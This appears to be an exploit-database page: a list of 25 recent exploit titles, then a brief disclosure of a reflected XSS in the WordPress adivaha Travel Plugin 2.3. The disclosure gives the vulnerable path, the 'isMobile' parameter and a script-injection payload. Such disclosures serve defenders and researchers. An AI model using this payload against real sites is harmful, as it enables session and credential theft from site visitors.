
25 changes to exploits/shellcodes/ghdb ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE) Shelly PRO 4PM v0.11.0 - Authentication Bypass Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated) Academy LMS 6.0 - Reflected XSS Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload JLex GuestBook 1.6.4 - Reflected XSS Joomla JLex Review 6.0.1 - Reflected XSS News Portal v4.0 - SQL Injection (Unauthorized) PHPJabbers Cleaning Business 1.0 - Reflected XSS PHPJabbers Night Club Booking 1.0 - Reflected XSS PHPJabbers Rental Property Booking 2.0 - Reflected XSS PHPJabbers Service Booking Script 1.0 - Reflected XSS PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS PHPJabbers Taxi Booking 2.0 - Reflected XSS Webedition CMS v2.9.8.8 - Remote Code Execution (RCE) Webedition CMS v2.9.8.8 - Stored XSS Webutler v3.2 - Remote Code Execution (RCE) WordPress adivaha Travel Plugin 2.3 - Reflected XSS WordPress adivaha Travel Plugin 2.3 - SQL Injection Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
35 lines
No EOL
961 B
Text
35 lines
No EOL
961 B
Text
# Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS
|
|
# Exploit Author: CraCkEr
|
|
# Date: 29/07/2023
|
|
# Vendor: adivaha - Travel Tech Company
|
|
# Vendor Homepage: https://www.adivaha.com/
|
|
# Software Link: https://wordpress.org/plugins/adiaha-hotel/
|
|
# Demo: https://www.adivaha.com/demo/adivaha-online/
|
|
# Version: 2.3
|
|
# Tested on: Windows 10 Pro
|
|
# Impact: Manipulate the content of the site
|
|
|
|
|
|
## Greetings
|
|
|
|
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
|
|
CryptoJob (Twitter) twitter.com/0x0CryptoJob
|
|
|
|
|
|
## Description
|
|
|
|
The attacker can send to victim a link containing a malicious URL in an email or instant message
|
|
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
|
|
|
|
|
|
Path: /mobile-app/v3/
|
|
|
|
GET parameter 'isMobile' is vulnerable to XSS
|
|
|
|
https://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS]
|
|
|
|
|
|
XSS Payload: clq95"><script>alert(1)</script>lb1ra
|
|
|
|
|
|
[-] Done |